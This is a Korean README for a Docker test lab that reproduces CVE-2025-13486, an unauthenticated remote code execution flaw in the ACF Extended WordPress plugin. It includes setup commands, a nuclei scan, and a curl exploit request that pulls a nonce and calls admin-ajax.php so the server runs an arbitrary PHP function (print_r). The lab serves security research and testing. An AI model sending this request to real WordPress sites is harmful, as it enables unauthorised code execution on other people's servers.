
CVE-2025-13486(ACF Extended RCE)용 Docker 테스트 환경. 보안 연구 목적으로만 사용하십시오.
ACF Extended RCE 취약점을 테스트하기 위한 원샷 Docker 구성입니다.
# 1. 플러그인 다운로드 (최초 1회 실행)
./download-plugins.sh
# 2. 환경 시작
docker-compose up -d --build
# 3. 설정 완료까지 약 30초 대기 후 테스트
nuclei -t CVE-2025-13486.yaml -u http://localhost:8888
다운로드 스크립트가 실패할 경우, 다음 파일을 plugins/에 수동으로 배치하세요:
ACF Pro (필수 의존성)
plugins/acf-pro.zipACF Extended 0.9.0.5 (취약한 버전)
plugins/acf-extended.zip# 홈페이지에서 nonce 추출
curl -s http://localhost:8888/ | grep -oP '"nonce":"([a-f0-9]+)"'
# print_r로 RCE 테스트
curl -X POST http://localhost:8888/wp-admin/admin-ajax.php \
-d "action=acfe/form/render_form_ajax&nonce=<NONCE>&form[render]=print_r&form[test]=PWNED"
docker-compose down -v
call_user_func_array()를 통한 인증 없는 RCE